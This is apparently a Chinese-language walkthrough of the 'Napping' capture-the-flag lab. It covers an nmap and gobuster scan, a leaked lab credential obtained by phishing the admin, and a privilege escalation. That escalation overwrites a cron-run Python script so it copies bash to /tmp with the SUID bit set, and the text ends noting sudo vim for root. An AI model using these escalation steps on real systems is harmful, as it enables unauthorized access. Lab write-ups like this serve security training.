Napping

端口扫描

root@ip-10-10-20-92:~# nmap -sTCV -p- --min-rate 1000 10.10.206.250

Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-05 11:42 BST
Nmap scan report for ip-10-10-206-250.eu-west-1.compute.internal (10.10.206.250)
Host is up (0.00020s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login
MAC Address: 02:E0:FD:85:5A:F7 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.63 seconds

80

root@ip-10-10-20-92:~# gobuster dir -u http://10.10.206.250/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.206.250/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Timeout:        10s
===============================================================
2023/10/05 11:45:38 Starting gobuster
===============================================================
/register.php (Status: 200)
/index.php (Status: 200)
/admin (Status: 301)
/welcome.php (Status: 302)
/logout.php (Status: 302)
/config.php (Status: 200)
/server-status (Status: 403)
===============================================================
2023/10/05 11:46:34 Finished
===============================================================

访问页面发现可以注册账号, 注册之后访问站点发现其功能是让管理员审查我们的页面, 我本来想的是 XSS 漏洞, 但是构造了半天还是没有办法完成操作, 查看 WP 后才发现是钓鱼, 仿照 WP 进行操作自己不知道为什么一直不成功, 先空着等回头自己知道怎么解决了再补, 最后我们可以收集到一个账号

daniel:C@ughtm3napping123

后渗透

daniel

利用得到的密码直接登陆即可

daniel —> adrian

我在用户 adrian 的家目录发现一个 py 脚本, 从我的观察来看这是一个定时任务并且刚好对应的 py 脚本我们有权修改所以可以基于此进行操作

daniel@napping:/home/adrian$ ls -al
total 48
drwxr-xr-x 6 adrian adrian         4096 Oct  5 13:10 .
drwxr-xr-x 4 root   root           4096 Mar 15  2022 ..
-rw-rw-r-- 1 adrian administrators   79 Oct  5 13:00 query.py
-rw-rw-r-- 1 adrian adrian           75 Mar 16  2022 .selected_editor
drwx------ 3 adrian adrian         4096 Oct  5 13:10 snap
-rw-r----- 1 root   adrian           56 Mar 16  2022 user.txt
daniel@napping:/home/adrian$ cat << EOF > query.py 
> import os
> os.system('cp /bin/bash /tmp/bash')
> os.system('chmod u+s /tmp/bash')
> EOF
# 等待一分钟后检查即可
daniel@napping:/home/adrian$ ls -al /tmp/bash
-rwsr-xr-x 1 adrian adrian 1183448 Oct  5 13:01 /tmp/bash
daniel@napping:/home/adrian$ /tmp/bash -p
bash-5.0$ id
uid=1001(daniel) gid=1001(daniel) euid=1000(adrian) groups=1001(daniel),1002(administrators)

adrian —> root

执行发现用户 adrian 存在 sudo 特权 vim#sudo